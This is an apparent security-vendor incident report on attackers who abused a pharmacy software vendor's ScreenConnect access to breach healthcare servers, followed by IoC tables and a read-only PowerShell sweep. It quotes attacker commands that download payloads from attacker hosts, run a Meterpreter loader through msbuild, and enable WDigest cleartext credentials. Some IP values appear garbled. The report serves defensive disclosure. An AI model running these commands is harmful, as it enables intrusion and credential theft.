Bitter Pill: Third-Party Pharmaceutical Vendor Linked to Pharmacy and Health Clinic Cyberattack

In a concerning development within the healthcare sector, Huntress has identified a series of unauthorized access that signifies internal reconnaissance and preparation for additional threat actor activity against multiple healthcare organizations.

The attackers abused a locally hosted instance of a widely-used remote access tool, ScreenConnect (utilized by the company Transaction Data Systems, which recently merged with and was renamed Outcomes, the makers of Rx30 and ComputerRx software), for initial access to victim organizations. The threat actor proceeded to take several steps, including installing additional remote access tools such as ScreenConnect or AnyDesk instances, to ensure persistent access to the environments.

In this article, there are multiple ScreenConnect instances at play; there are a total of four instances observed across two endpoints from completely distinct organizations (i.e., not the same company, not managed by the same MSP, geographically separated, etc.). One of those ScreenConnect instances appeared and was used by the threat actor on both endpoints.

There were similarities in tactics, techniques, and procedures (TTPs) across both endpoints, as well as multiple intersections in indicators of compromise (IOCs). Specifically, one ScreenConnect instance (instance B) was observed being actively used on both endpoints, the <redacted 1> account was observed being used to access both endpoints via ScreenConnect, and the file test.xml was downloaded to both endpoints via PowerShell.

Endpoint 1 is a Windows Server 2019 Standard system within an infrastructure in the pharmaceutical field. Log data allowed the Huntress team to see as far back as August 9, 2023, where the team observed ScreenConnect instance A being accessed via an account named <redacted 1>.
There were repeated "Connected" and "Disconnected" messages for the account until the file ConnectWiseControl.ClientSetup.msi was downloaded and launched, installing ScreenConnect instance B on the endpoint. Then, beginning on August 10, 2023, the <redacted 1> account was used to access the endpoint via ScreenConnect instance B. There were several pairs of "Connected" and "Disconnected" messages in the logs for the <redacted 1> account until October 28, 2023.

On October 28, the <redacted 2> account was used to access ScreenConnect instance B and run the following PowerShell command:

    powershell -command "(New-Object Net.WebClient).DownloadFile('http://257149103/a.msi', 'C:\Users\Administrator\Documents\a.msi')"

The a.msi file was launched via MsiExec.exe, installing ScreenConnect instance C on the endpoint, connecting to IP address 45.66.230.146 via port 8041. Shortly after the installation completed, the <redacted 2> account disconnected from ScreenConnect instance B.

Two days later, on October 30, ScreenConnect instance C was used to run the following PowerShell command:

    powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('http://119.91.138.133:443/test.xml', 'c:\programdata\test.xml')"

Almost 20 hours later, on October 31, ScreenConnect instance B was used to run the following command:

    C:\windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe C:\programdata\test.xml

The payload, test.xml, consists of C# code forking the publicly available nps project for detection evasion and process execution. As designed, the payload attempts to load a Metasploit Meterpreter instance in memory, but antimalware protections on the system identified and attempted to terminate execution. However, this does not appear to have succeeded, as additional processes were observed being launched via the Printer Spooler service (spoolsv.exe). For example, the following processes were observed being run:

    nslookup myip.opendns.com Resolver1.opendns.com

    powershell -command "Import-Module ActiveDirectory; Get-ADComputer -Filter * -Properties * | Sort IPv4Address | FT Name, ipv4*, oper*, LastLogonDate -Autosize"

    C:\Windows\system32\cmd.exe /S /D /c "type C:\Windows\System32\mimilsa.log | findstr /V Mailbox"

Endpoint 2 is also a Windows Server 2019 Standard system, within an infrastructure in the healthcare field. Log data illustrates that ScreenConnect instance B (the same instance B observed on endpoint 1) was installed and actively being connected to via the <redacted 1> account as of November 8, 2022. On November 1, 2023, the file s.msi was transferred to the endpoint via the ScreenConnect instance; launching this file led to ScreenConnect instance D being installed on this endpoint, with the instance configured to connect to 185124598 on port 8041.

It was clear that ScreenConnect instance B was still running and accessible on the endpoint on November 5, 2023; an error message indicated that the instance attempted to connect to the configured endpoint, and a DNS Client message was observed indicating that the configured endpoint could not be resolved.

On November 6, the following PowerShell command was run via ScreenConnect instance D:

    powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('http://119.91.138.133:443/test.xml', 'c:\programdata\test.xml')"

The use of msbuild.exe to compile the file and launch the payload was not observed on this endpoint. However, four hours later, the following PowerShell command was run, also via ScreenConnect instance D:

    powershell -Command "$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://bashupload.com/PXYpf/a.msi', 'c:\programdata\a.msi')"

This file was launched via msiexec.exe, installing the AnyDeskMSI Service. However, about a minute and a half after being launched, this service was stopped via taskkill.exe.

Approximately four hours later, the threat actor made multiple attempts to create the "manager" user account and add the account to the local Administrator group on the endpoint. Once their efforts were successful, the threat actor logged out, then logged back into ScreenConnect instance D via the newly created account, and then used that instance to transfer and launch the file
Advanced_IP_Scanner_2.5.4594.1.exe. Finally, the threat actor was observed running the following commands:

    mshta http1199113813399995E1Ch

    taskkill /F /IM mshta.exe

    reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

ScreenConnect instance B, found on both endpoints and accessed via the <redacted 1> account, per the user.config file retrieved from one of the endpoints monitored via Huntress, is tied to rs.tdsclinical.com.

The observed domain is legitimate and associated with Transaction Data Systems (now named Outcomes). At this time, Huntress cannot identify whether Transaction Data Systems itself has been breached, if credentials for a legitimate Transaction Data Systems-associated employee or user have been leaked, or if some other mechanism was involved tying their remote management of these clients to subsequent threat actor abuse.

Huntress has identified and urges immediate action upon the following IoCs:

| IP Address | Hosting Provider | Hosting Location | Function |
|---|---|---|---|
| 119.91.138.133 | Tencent Computer Systems | CN | Primary infrastructure for storing and retrieving post-access payloads |
| 185124598 | Private Layer Inc | PA | Connecting server associated with malicious ScreenConnect instance D |
| 45.66.230.146 | Delis LLC | NL | Connecting server associated with malicious ScreenConnect instance C |
| 257149103 | Red Byte LLC | PL | Hosting server for AnyDesk MSI installation |

| Name | SHA256 | Function |
|---|---|---|
| test.xml | 9f42bf3a61faaab8f86abb3c7f9db417bffb3474a55169a4efb1d2386545e4e8 | C# payload designed to load Meterpreter into victim memory |
| a.msi | 70f865a7f8a01356685b17abdf6ac738e9a9098f1ae2d5a34cfa3610cb28fc56 | AnyDesk MSI installer |
| s.msi | 8c3b4febe58df0a01126d78109f52035d34a4e03f02b5d4fca3e4d94f3f657b3 | ScreenConnect MSI installer |

| ScreenConnect Instance ID | Description |
|---|---|
| adf02e34cba839d2 | ScreenConnect instance ID B, associated with rs.tdsclinical.com |
| e3e2410d655306ff | ScreenConnect instance ID C, associated with 45.66.230.146 |
| 4974c38508ef2b18 | ScreenConnect instance ID D, associated with 185124598 |

- C:\programdata\a.msi
- C:\programdata\test.xml
- C:\Users\Administrator\Documents\a.msi
- S.msi
- C:\Users\manager\Documents\ConnectWiseControl\Files\Advanced_IP_Scanner_2.5.4594.1.exe
- C:\Program Files (x86)\ScreenConnect Client (<unique identifier>)\ScreenConnect.ClientService.exe

While researching this event, Huntress analysts identified an open directory on 257149103, shown in the following figure.

In addition to a.msi (the AnyDesk installer previously discussed), two additional files were located.

The IP in question appears to be a tool repository for threat actors, although the lack of observations on b.msi and payloads in t.zip in monitored environments makes its association with the ScreenConnect incidents uncertain. However, the payloads in question match overall observed behaviors in terms of remote access tool installation (b.msi) and payloads associated with system survey (masscan64.exe) and data capture (WinPcap_4_1_3.exe). The outlier is veeam.exe, as all other observed activity indicates a combination of credential capture or reuse with living-off-the-land techniques or abuse of legitimate software.

Pharmacies and other healthcare organizations that may be clients of Transaction Data Systems/Outcomes should immediately examine their systems and networks for the above IoCs. Any discovery of these should be taken seriously and investigated promptly. Given the potential implications of such a breach in the healthcare industry, particularly regarding patient data privacy and availability of critical services, a comprehensive response is essential.

It's imperative for organizations within the healthcare domain to recognize the gravity of such intrusions and take concerted steps to safeguard their infrastructure. Enhanced endpoint monitoring, robust cybersecurity frameworks, and proactive threat hunting are no longer optional but a necessity in the face of such sophisticated cyber threats.

In our effort to respond responsibly to this situation, we have made several attempts through various channels to contact
Transaction Data Systems (now Outcomes) to communicate our findings and offer support in addressing these incidents. We have not yet been able to engage with their team.

We remain open and ready to collaborate for the safety and security of all parties involved.
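A read-only endpoint sweep for the host-based indicators listed above, added here as an example and not taken from Huntress or its tooling. It assumes Windows PowerShell 5.1 or later in an elevated 64-bit session and uses the instance IDs, hashes and paths as given in the IoC section; a hit on instance B alone can be the vendor's own remote management and calls for a review of its session history.

```powershell
# Added example: read-only sweep for the host-based IoCs in this report.
# Run from an elevated PowerShell session on the endpoint being checked.
$instanceIds = @{                       # ScreenConnect instance IDs from the report
    'adf02e34cba839d2' = 'instance B (vendor-associated, abused by the threat actor)'
    'e3e2410d655306ff' = 'instance C (installed by the threat actor)'
    '4974c38508ef2b18' = 'instance D (installed by the threat actor)'
}
$hashes = @{                            # SHA256 values from the report, lowercase
    '9f42bf3a61faaab8f86abb3c7f9db417bffb3474a55169a4efb1d2386545e4e8' = 'test.xml'
    '70f865a7f8a01356685b17abdf6ac738e9a9098f1ae2d5a34cfa3610cb28fc56' = 'a.msi'
    '8c3b4febe58df0a01126d78109f52035d34a4e03f02b5d4fca3e4d94f3f657b3' = 's.msi'
}
$findings = [System.Collections.Generic.List[object]]::new()
function Add-Finding([string]$Check, [string]$Detail) {
    $findings.Add([pscustomobject]@{ Check = $Check; Detail = $Detail })
}

# 1. List every ScreenConnect client on the host; several instances on one box deserve a look.
$roots = @(${env:ProgramFiles(x86)}, $env:ProgramFiles) | Where-Object { $_ }
Get-ChildItem -Path $roots -Directory -ErrorAction SilentlyContinue | ForEach-Object {
    if ($_.Name -match '^ScreenConnect Client \(([0-9a-f]+)\)$') {
        $id = $Matches[1].ToLower()
        $note = if ($instanceIds.ContainsKey($id)) { $instanceIds[$id] } else { 'not in report; confirm it is expected' }
        Add-Finding 'ScreenConnect' "$id : $note"
    }
}

# 2. Hash files at the reported paths plus anything dropped through ScreenConnect file transfer.
$candidates = @('C:\programdata\a.msi', 'C:\programdata\test.xml', 'C:\Users\Administrator\Documents\a.msi')
$candidates += (Get-ChildItem 'C:\Users\*\Documents\ConnectWiseControl\Files\*' -File -ErrorAction SilentlyContinue).FullName
foreach ($path in $candidates | Where-Object { $_ -and (Test-Path -LiteralPath $_ -PathType Leaf) }) {
    $sha = (Get-FileHash -LiteralPath $path -Algorithm SHA256).Hash.ToLower()
    $note = if ($hashes.ContainsKey($sha)) { "matches reported $($hashes[$sha])" } else { 'hash not in report' }
    Add-Finding 'File' "$path sha256=$sha ($note)"
}

# 3. WDigest cleartext credential caching, which the actor switched on with reg add.
$wd = Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest' -ErrorAction SilentlyContinue
if ($wd.UseLogonCredential -eq 1) { Add-Finding 'Registry' 'WDigest UseLogonCredential is 1' }

# 4. The log file read on endpoint 1 and the local account created on endpoint 2.
if (Test-Path 'C:\Windows\System32\mimilsa.log') { Add-Finding 'File' 'C:\Windows\System32\mimilsa.log exists' }
if (Get-LocalUser -Name 'manager' -ErrorAction SilentlyContinue) {
    Add-Finding 'Account' "local user 'manager' exists; verify who created it and when"
}

if ($findings.Count) { $findings | Format-Table -AutoSize -Wrap } else { 'No reported host IoCs found.' }
```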